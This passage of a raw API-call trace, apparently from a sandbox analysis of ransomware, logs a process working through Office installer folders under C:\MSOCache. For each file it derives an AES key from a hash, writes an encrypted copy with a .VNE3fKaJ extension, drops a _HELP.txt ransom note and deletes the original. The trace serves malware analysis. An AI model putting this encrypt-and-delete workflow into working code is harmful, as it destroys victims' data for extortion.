dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0120.451] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52128) returned 1 [0120.452] CryptCreateHash (in: hProv=0xa52128, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0120.452] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0120.452] CryptDeriveKey (in: hProv=0xa52128, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0120.452] GetFileSize (in: hFile=0x344, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x75e [0120.452] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.454] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0120.454] CryptDestroyKey (hKey=0x284d568) returned 1 [0120.454] CryptReleaseContext (hProv=0xa52128, dwFlags=0x0) returned 1 [0120.454] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\_HELP.txt" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\_help.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x326bfec, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0120.455] GetFileType (hFile=0x340) returned 0x1 [0120.455] GetLastError () returned 0xb7 [0120.455] SetLastError (dwErrCode=0xb7) [0120.455] GetLastError () returned 0xb7 [0120.455] SetLastError (dwErrCode=0xb7) [0120.455] WriteFile (in: hFile=0x340, lpBuffer=0x326ac20*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x326ac1c, lpOverlapped=0x0 | out: lpBuffer=0x326ac20*, lpNumberOfBytesWritten=0x326ac1c*=0xed, lpOverlapped=0x0) returned 1 [0120.456] CloseHandle (hObject=0x340) returned 1 [0120.456] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0120.457] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 0 [0120.457] FindClose (in: hFindFile=0x284d4e8 | out: hFindFile=0x284d4e8) returned 1 [0120.457] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0120.457] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 0x284d4e8 [0120.475] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0120.475] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0120.475] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0120.475] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PublisherMUI.msi", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherMUI.msi", lpUsedDefaultChar=0x0) returned 17 [0120.475] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x340 [0120.476] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi.VNE3fKaJ" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi.vne3fkaj"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x344 [0120.477] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52128) returned 1 [0120.477] CryptCreateHash (in: hProv=0xa52128, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0120.477] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0120.477] CryptDeriveKey (in: hProv=0xa52128, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0120.477] GetFileSize (in: hFile=0x340, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x265c00 [0120.478] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.714] CryptDestroyHash (hHash=0x284d528) returned 1 [0120.714] CryptDestroyKey (hKey=0x284d568) returned 1 [0120.714] CryptReleaseContext (hProv=0xa52128, dwFlags=0x0) returned 1 [0120.714] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\_HELP.txt" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\_help.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x326bfec, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x344 [0120.715] GetFileType (hFile=0x344) returned 0x1 [0120.716] GetLastError () returned 0x0 [0120.716] SetLastError (dwErrCode=0x0) [0120.716] GetLastError () returned 0x0 [0120.716] SetLastError (dwErrCode=0x0) [0120.716] WriteFile (in: hFile=0x344, lpBuffer=0x326ac20*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x326ac1c, lpOverlapped=0x0 | out: lpBuffer=0x326ac20*, lpNumberOfBytesWritten=0x326ac1c*=0xed, lpOverlapped=0x0) returned 1 [0120.716] CloseHandle (hObject=0x344) returned 1 [0120.717] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.msi")) returned 1 [0120.720] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0120.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PublisherMUI.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PublisherMUI.xml", lpUsedDefaultChar=0x0) returned 17 [0120.720] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x344 [0120.720] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml.VNE3fKaJ" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml.vne3fkaj"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0120.721] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52128) returned 1 [0120.721] CryptCreateHash (in: hProv=0xa52128, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0120.721] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0120.721] CryptDeriveKey (in: hProv=0xa52128, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0120.721] GetFileSize (in: hFile=0x344, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x5aa [0120.721] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.723] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0120.723] CryptDestroyKey (hKey=0x284d568) returned 1 [0120.723] CryptReleaseContext (hProv=0xa52128, dwFlags=0x0) returned 1 [0120.724] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\_HELP.txt" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\_help.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x326bfec, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0120.724] GetFileType (hFile=0x340) returned 0x1 [0120.725] GetLastError () returned 0xb7 [0120.725] SetLastError (dwErrCode=0xb7) [0120.725] GetLastError () returned 0xb7 [0120.725] SetLastError (dwErrCode=0xb7) [0120.725] WriteFile (in: hFile=0x340, lpBuffer=0x326ac20*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x326ac1c, lpOverlapped=0x0 | out: lpBuffer=0x326ac20*, lpNumberOfBytesWritten=0x326ac1c*=0xed, lpOverlapped=0x0) returned 1 [0120.725] CloseHandle (hObject=0x340) returned 1 [0120.726] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml")) returned 1 [0120.727] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0120.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PubLR.cab", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PubLR.cab", lpUsedDefaultChar=0x0) returned 10 [0120.727] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0120.727] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Setup.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Setup.xml", lpUsedDefaultChar=0x0) returned 10 [0120.727] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x340 [0120.727] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml.VNE3fKaJ" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml.vne3fkaj"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x344 [0120.728] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52128) returned 1 [0120.728] CryptCreateHash (in: hProv=0xa52128, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0120.728] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0120.728] CryptDeriveKey (in: hProv=0xa52128, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0120.728] GetFileSize (in: hFile=0x340, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x648 [0120.728] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.742] CryptDestroyHash (hHash=0x284d528) returned 1 [0120.742] CryptDestroyKey (hKey=0x284d568) returned 1 [0120.742] CryptReleaseContext (hProv=0xa52128, dwFlags=0x0) returned 1 [0120.742] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\_HELP.txt" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\_help.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x326bfec, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x344 [0120.743] GetFileType (hFile=0x344) returned 0x1 [0120.743] GetLastError () returned 0xb7 [0120.743] SetLastError (dwErrCode=0xb7) [0120.743] GetLastError () returned 0xb7 [0120.743] SetLastError (dwErrCode=0xb7) [0120.743] WriteFile (in: hFile=0x344, lpBuffer=0x326ac20*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x326ac1c, lpOverlapped=0x0 | out: lpBuffer=0x326ac20*, lpNumberOfBytesWritten=0x326ac1c*=0xed, lpOverlapped=0x0) returned 1 [0120.744] CloseHandle (hObject=0x344) returned 1 [0120.744] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0120.746] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 0 [0120.746] FindClose (in: hFindFile=0x284d4e8 | out: hFindFile=0x284d4e8) returned 1 [0120.746] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0120.746] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 0x284d4e8 [0120.837] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0120.837] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0120.838] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0120.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OutlkLR.cab", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlkLR.cab", lpUsedDefaultChar=0x0) returned 12 [0120.838] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0120.838] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OutlookMUI.msi", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookMUI.msi", lpUsedDefaultChar=0x0) returned 15 [0120.838] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x340 [0120.838] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi.VNE3fKaJ" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi.vne3fkaj"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388 [0120.839] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52128) returned 1 [0120.839] CryptCreateHash (in: hProv=0xa52128, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0120.839] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0120.839] CryptDeriveKey (in: hProv=0xa52128, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0120.839] GetFileSize (in: hFile=0x340, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2bba00 [0120.839] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0121.170] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0121.170] CryptDestroyKey (hKey=0x284d568) returned 1 [0121.170] CryptReleaseContext (hProv=0xa52128, dwFlags=0x0) returned 1 [0121.170] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\_HELP.txt" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\_help.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x326bfec, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388 [0121.171] GetFileType (hFile=0x388) returned 0x1 [0121.171] GetLastError () returned 0x0 [0121.171] SetLastError (dwErrCode=0x0) [0121.171] GetLastError () returned 0x0 [0121.171] SetLastError (dwErrCode=0x0) [0121.171] WriteFile (in: hFile=0x388, lpBuffer=0x326ac20*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x326ac1c, lpOverlapped=0x0 | out: lpBuffer=0x326ac20*, lpNumberOfBytesWritten=0x326ac1c*=0xed, lpOverlapped=0x0) returned 1 [0121.172] CloseHandle (hObject=0x388) returned 1 [0121.172] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.msi")) returned 1 [0121.178] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0121.178] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OutlookMUI.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutlookMUI.xml", lpUsedDefaultChar=0x0) returned 15 [0121.178] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x388 [0121.178] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.VNE3fKaJ" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.vne3fkaj"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0121.178] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52128) returned 1 [0121.179] CryptCreateHash (in: hProv=0xa52128, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0121.179] CryptHashData (hHash=0x284d528, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0121.179] CryptDeriveKey (in: hProv=0xa52128, Algid=0x6610, hBaseData=0x284d528, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0121.179] GetFileSize (in: hFile=0x388, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xc72 [0121.179] ReadFile (in: hFile=0x388, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0121.191] CryptDestroyHash (hHash=0x284d528) returned 1 [0121.191] CryptDestroyKey (hKey=0x284d568) returned 1 [0121.191] CryptReleaseContext (hProv=0xa52128, dwFlags=0x0) returned 1 [0121.191] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\_HELP.txt" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\_help.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x326bfec, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0121.192] GetFileType (hFile=0x340) returned 0x1 [0121.192] GetLastError () returned 0xb7 [0121.192] SetLastError (dwErrCode=0xb7) [0121.192] GetLastError () returned 0xb7 [0121.192] SetLastError (dwErrCode=0xb7) [0121.192] WriteFile (in: hFile=0x340, lpBuffer=0x326ac20*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x326ac1c, lpOverlapped=0x0 | out: lpBuffer=0x326ac20*, lpNumberOfBytesWritten=0x326ac1c*=0xed, lpOverlapped=0x0) returned 1 [0121.193] CloseHandle (hObject=0x340) returned 1 [0121.193] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml")) returned 1 [0121.194] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 1 [0121.194] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Setup.xml", cchWideChar=-1, lpMultiByteStr=0x326cc70, cbMultiByte=260, lpDefaultChar=0x326c44f, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Setup.xml", lpUsedDefaultChar=0x0) returned 10 [0121.194] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x340 [0121.195] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.VNE3fKaJ" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.vne3fkaj"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388 [0121.196] CryptAcquireContextW (in: phProv=0x326bfec, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x326bfec*=0xa52128) returned 1 [0121.197] CryptCreateHash (in: hProv=0xa52128, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x326bff0 | out: phHash=0x326bff0) returned 1 [0121.197] CryptHashData (hHash=0x284d5a8, pbData=0xa31098, dwDataLen=0x100, dwFlags=0x0) returned 1 [0121.197] CryptDeriveKey (in: hProv=0xa52128, Algid=0x6610, hBaseData=0x284d5a8, dwFlags=0x0, phKey=0x326bfe4 | out: phKey=0x326bfe4*=0x284d568) returned 1 [0121.197] GetFileSize (in: hFile=0x340, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x106f [0121.197] ReadFile (in: hFile=0x340, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0121.218] CryptDestroyHash (hHash=0x284d5a8) returned 1 [0121.218] CryptDestroyKey (hKey=0x284d568) returned 1 [0121.218] CryptReleaseContext (hProv=0xa52128, dwFlags=0x0) returned 1 [0121.218] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\_HELP.txt" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\_help.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x326bfec, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388 [0121.219] GetFileType (hFile=0x388) returned 0x1 [0121.219] GetLastError () returned 0xb7 [0121.219] SetLastError (dwErrCode=0xb7) [0121.219] GetLastError () returned 0xb7 [0121.219] SetLastError (dwErrCode=0xb7) [0121.219] WriteFile (in: hFile=0x388, lpBuffer=0x326ac20*, nNumberOfBytesToWrite=0xed, lpNumberOfBytesWritten=0x326ac1c, lpOverlapped=0x0 | out: lpBuffer=0x326ac20*, lpNumberOfBytesWritten=0x326ac1c*=0xed, lpOverlapped=0x0) returned 1 [0121.220] CloseHandle (hObject=0x388) returned 1 [0121.220] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml")) returned 1 [0121.221] FindNextFileW (in: hFindFile=0x284d4e8, lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 0 [0121.221] FindClose (in: hFindFile=0x284d4e8 | out: hFindFile=0x284d4e8) returned 1 [0121.221] FindNextFileW (in: hFindFile=0x284d4a8, lpFindFileData=0x326cef8 | out: lpFindFileData=0x326cef8) returned 1 [0121.221] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x326c168 | out: lpFindFileData=0x326c168) returned 0x284d4e8 [0121.222] GetDriveTypeA (lpRootPathName="C") returned 0x1 [0121.222] FindNextFileW (in: hFindFile=0x284d4e8, 